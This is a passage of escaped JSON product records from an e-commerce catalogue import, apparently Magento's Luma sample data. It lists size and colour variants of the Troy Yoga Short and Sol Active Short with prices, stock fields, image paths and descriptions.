Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"troy-yoga-short-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh09-blue_alt1.jpg,\\/m\\/s\\/msh09-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh09-blue_alt1.jpg,\\/m\\/s\\/msh09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"941\":{\"sku\":\"MSH09-36-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Troy Yoga Short-36-Green\",\"description\":\"<p>The versatile, all-purpose Troy Yoga Short is knee-lengthed with an elastic waistband with drawstring, making it comfortably flexible. The removable LumaTech&trade; wicking liner is also bacteria resistant.<\\/p>\\n<p>&bull; Navy polyester pinstripe shorts.<br \\/>&bull; Woven fabric with moderate stretch.<br \\/>&bull; 62% cotton\\/34% nylon\\/4% spandex.<br \\/>&bull; LumaTech&trade; lining.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"troy-yoga-short-36-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Green\"},\"942\":{\"sku\":\"MSH09\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Troy Yoga Short\",\"description\":\"<p>The versatile, all-purpose Troy Yoga Short is knee-lengthed with an elastic waistband with drawstring, making it comfortably flexible. The removable LumaTech&trade; wicking liner is also bacteria resistant.<\\/p>\\n<p>&bull; Navy polyester pinstripe shorts.<br \\/>&bull; Woven fabric with moderate stretch.<br \\/>&bull; 62% cotton\\/34% nylon\\/4% spandex.<br \\/>&bull; LumaTech&trade; lining.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Base Layer,material=Cotton|Nylon|LumaTech&trade;|Spandex,pattern=Solid,climate=Indoor|Hot|Warm,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MSH09-32-Black,size=32,color=Black|sku=MSH09-32-Blue,size=32,color=Blue|sku=MSH09-32-Green,size=32,color=Green|sku=MSH09-33-Black,size=33,color=Black|sku=MSH09-33-Blue,size=33,color=Blue|sku=MSH09-33-Green,size=33,color=Green|sku=MSH09-34-Black,size=34,color=Black|sku=MSH09-34-Blue,size=34,color=Blue|sku=MSH09-34-Green,size=34,color=Green|sku=MSH09-36-Black,size=36,color=Black|sku=MSH09-36-Blue,size=36,color=Blue|sku=MSH09-36-Green,size=36,color=Green\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh09-blue_alt1.jpg,\\/m\\/s\\/msh09-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh09-blue_alt1.jpg,\\/m\\/s\\/msh09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Base Layer\",\"material\":\"Cotton|Nylon|LumaTech&trade;|Spandex\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Hot|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"943\":{\"sku\":\"MSH10-32-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Sol Active Short-32-Blue\",\"description\":\"<p>You\'ll let your fear go and push your limits in your new Sol Active Short. Featuring ultra-breathable performance fabric and a flat comfort-fit waistband, the Sol Active Short is perfect for high-intensity circuits or high-heat bikram.<\\/p>\\n<p>&bull; Light blue jersey shorts with mesh detail.<br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Machine wash cold, tumble dry low.<br \\/>&bull; Superior performance fabric.<br \\/>&bull; Flat-lock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sol-active-short-32-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh10-blue_alt1.jpg,\\/m\\/s\\/msh10-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh10-blue_alt1.jpg,\\/m\\/s\\/msh10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Blue\"},\"944\":{\"sku\":\"MSH10-32-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Sol Active Short-32-Green\",\"description\":\"<p>You\'ll let your fear go and push your limits in your new Sol Active Short. Featuring ultra-breathable performance fabric and a flat comfort-fit waistband, the Sol Active Short is perfect for high-intensity circuits or high-heat bikram.<\\/p>\\n<p>&bull; Light blue jersey shorts with mesh detail.<br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Machine wash cold, tumble dry low.<br \\/>&bull; Superior performance fabric.<br \\/>&bull; Flat-lock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sol-active-short-32-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Green\"},\"945\":{\"sku\":\"MSH10-32-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Sol Active Short-32-Purple\",\"description\":\"<p>You\'ll let your fear go and push your limits in your new Sol Active Short. Featuring ultra-breathable performance fabric and a flat comfort-fit waistband, the Sol Active Short is perfect for high-intensity circuits or high-heat bikram.<\\/p>\\n<p>&bull; Light blue jersey shorts with mesh detail.<br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Machine wash cold, tumble dry low.<br \\/>&bull; Superior performance fabric.<br \\/>&bull; Flat-lock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sol-active-short-32-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Purple\"},\"946\":{\"sku\":\"MSH10-33-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Sol Active Short-33-Blue\",\"description\":\"<p>You\'ll let your fear go and push your limits in your new Sol Active Short. Featuring ultra-breathable performance fabric and a flat comfort-fit waistband, the Sol Active Short is perfect for high-intensity circuits or high-heat bikram.<\\/p>\\n<p>&bull; Light blue jersey shorts with mesh detail.<br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Machine wash cold, tumble dry low.<br \\/>&bull; Superior performance fabric.<br \\/>&bull; Flat-lock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sol-active-short-33-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh10-blue_alt1.jpg,\\/m\\/s\\/msh10-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh10-blue_alt1.jpg,\\/m\\/s\\/msh10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Blue\"},\"947\":{\"sku\":\"MSH10-33-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Sol Active Short-33-Green\",\"description\":\"<p>You\'ll let your fear go and push your limits in your new Sol Active Short. Featuring ultra-breathable performance fabric and a flat comfort-fit waistband, the Sol Active Short is perfect for high-intensity circuits or high-heat bikram.<\\/p>\\n<p>&bull; Light blue jersey shorts with mesh detail.<br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Machine wash cold, tumble dry low.<br \\/>&bull; Superior performance fabric.<br \\/>&bull; Flat-lock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sol-active-short-33-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Green\"},\"948\":{\"sku\":\"MSH10-33-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Sol Active Short-33-Purple\",\"description\":\"<p>You\'ll let your fear go and push your limits in your new Sol Active Short. Featuring ultra-breathable performance fabric and a flat comfort-fit waistband, the Sol Active Short is perfect for high-intensity circuits or high-heat bikram.<\\/p>\\n<p>&bull; Light blue jersey shorts with mesh detail.<br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Machine wash cold, tumble dry low.<br \\/>&bull; Superior performance fabric.<br \\/>&bull; Flat-lock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sol-active-short-33-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\"